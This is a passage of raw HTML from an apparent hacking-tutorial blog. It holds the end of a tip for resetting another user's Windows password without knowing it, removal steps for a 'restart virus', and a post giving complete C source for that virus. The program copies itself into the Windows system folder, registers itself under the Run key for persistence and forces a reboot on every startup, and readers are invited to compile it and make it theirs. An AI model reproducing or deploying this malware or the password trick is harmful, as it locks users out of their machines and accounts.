baseline;">net user John *</strong> and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">I hope it helped atleast someone.:-)</div><span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="border-color: initial; border-color: initial; border-style: initial; border-width: initial; font-style: inherit; height: 60px;"><ins style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: inline-table; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"></ins></span></span></span></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-30272861943666722072011-07-29T08:52:00.001-07:002011-07-29T08:52:48.039-07:00Testing And Removing The Virus[RESTART] From Your PC<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 12px; line-height: 18px;"><span class="Apple-style-span" style="color: yellow;"></span></span><br />
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">You can compile and test this virus on your own PC without any fear. To test, just doubleclick the <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sysres.exe</strong> file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.<br />
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">1. Reboot your computer in the <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">SAFE MODE</strong></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">2. Goto</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">X:WindowsSystem</strong></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">(<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">X</strong> can be C,D,E or F)</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">3.You will find a file by name <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sysres.exe</strong>, delete it.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">4.Type <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">regedit </strong>in <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">run</strong>.You will goto registry editor.Here navigate to</span></div><span class="Apple-style-span" style="color: yellow;"><ins style="border-bottom-style: none; border-color: initial; border-color: initial; border-left-style: none; border-right-style: none; border-style: initial; border-top-style: none; border-width: initial; display: inline-table; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><ins id="aswift_3_anchor" style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: block; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><iframe allowtransparency="true" frameborder="0" height="60" hspace="0" id="aswift_3" marginheight="0" marginwidth="0" name="aswift_3" scrolling="no" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; left: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: absolute; top: 0px; vertical-align: baseline;" vspace="0" width="468"></iframe></ins></ins><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRun</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">There, on the right site you will see an entry by name “<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sres</strong>“.Delete this entry.That’s it.You have removed this Virus successfully.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Logic Behind The Working Of The Virus</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">If I don’t explain the logic(<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Algorithm</strong>) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program.<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"> If you have further doubts please pass comments.</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">LOGIC:</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">1. First the virus will find the Root partition (Partition on which Windows is installed).</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">2. Next it will determine whether the Virus file is already copied(Already infected) into <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">X:WindowsSystem</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">3. If not it will just place a copy of itself into <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">X:WindowsSystem</strong> and makes a registry entry to put this virus file onto the startup.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">4. Or else if the virus is already found in the <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">X:WindowsSystem</strong> directory(folder), then it just gives a command to <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">restart</strong> the computer.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">This process is repeated every time the PC is restarted.</div><span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="border-color: initial; border-color: initial; border-style: initial; border-width: initial; font-style: inherit; height: 60px;"><ins style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: inline-table; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"></ins></span></span></span></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-34990188356257638232011-07-29T08:49:00.001-07:002011-07-29T08:49:59.760-07:00Create Virus to Restart Computer On Start Up<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 12px; line-height: 18px;"><span class="Apple-style-span" style="color: yellow;"></span></span><br />
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">I suppose everyone using Computer might have come across the term Virus but have you ever wondered about creating one?</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">In this post <a href="http://learnhacking.in/" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="Learn Hackig | Ethical Hacking | Learn How to Hack">I</a> will tell you how to create a virus in C that restarts computer on startup</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">You need to compile the code given in C compiler and make it yours.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">Source Code in C ::::::</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">#include<stdio.h><br />
#include<dos.h><br />
#include<dir.h></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">int found,drive_no;char buff[128];</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">void findroot()<br />
{<br />
int done;<br />
struct ffblk ffblk; //File block structure<br />
done=findfirst(“C:\windows\system”,&ffblk,FA_DIREC); //to determine the root drive<br />
if(done==0)<br />
{<br />
done=findfirst(“C:\windows\system\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not<br />
if(done==0)<br />
{<br />
found=1; //means that the system is already infected<br />
return;<br />
}<br />
drive_no=1;<br />
return;<br />
}<br />
done=findfirst(“D:\windows\system”,&ffblk,FA_DIREC);<br />
if(done==0)<br />
{<br />
done=findfirst(“D:\windows\system\sysres.exe”,&ffblk,0);<br />
if<br />
(done==0)<br />
{<br />
found=1;return;<br />
}<br />
drive_no=2;<br />
return;<br />
}<br />
done=findfirst(“E:\windows\system”,&ffblk,FA_DIREC);<br />
if(done==0)<br />
{<br />
done=findfirst(“E:\windows\system\sysres.exe”,&ffblk,0);<br />
if(done==0)<br />
{<br />
found=1;<br />
return;<br />
}<br />
drive_no=3;<br />
return;<br />
}<br />
done=findfirst(“F:\windows\system”,&ffblk,FA_DIREC);<br />
if(done==0)<br />
{<br />
done=findfirst(“F:\windows\system\sysres.exe”,&ffblk,0);<br />
if(done==0)<br />
{<br />
found=1;<br />
return;<br />
}<br />
drive_no=4;<br />
return;<br />
}<br />
else<br />
exit(0);<br />
}</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">void main()<br />
{<br />
FILE *self,*target;<br />
findroot();<br />
if(found==0) //if the system is not already infected<br />
{<br />
self=fopen(_argv[0],”rb”); //The virus file open’s itself<br />
switch(drive_no)<br />
{<br />
case 1:<br />
target=fopen(“C:\windows\system\sysres.exe”,”wb”); //to place a copy of itself in a remote place<br />
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\<br />
CurrentVersion\Run /v sres /t REG_SZ /d<br />
C:\windows\system\ sysres.exe”); //put this file to registry for starup<br />
break;</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">case 2:<br />
target=fopen(“D:\windows\system\sysres.exe”,”wb”);<br />
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\<br />
CurrentVersion\Run /v sres /t REG_SZ /d<br />
D:\windows\system\sysres.exe”);<br />
break;</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">case 3:<br />
target=fopen(“E:\windows\system\sysres.exe”,”wb”);<br />
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\<br />
CurrentVersion\Run /v sres /t REG_SZ /d<br />
E:\windows\system\sysres.exe”);<br />
break;</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">case 4:<br />
target=fopen(“F:\windows\system\sysres.exe”,”wb”);<br />
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\<br />
CurrentVersion\Run /v sres /t REG_SZ /d<br />
F:\windows\system\sysres.exe”);<br />
break;</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">default:<br />
exit(0);<br />
}</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">while(fread(buff,1,1,self)>0)<br />
fwrite(buff,1,1,target);<br />
fcloseall();<br />
}</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">else<br />
system(“shutdown -r -t 0?); //if the system is already infected then just give a command to restart<br />
}</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">__________________________________________________________________</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 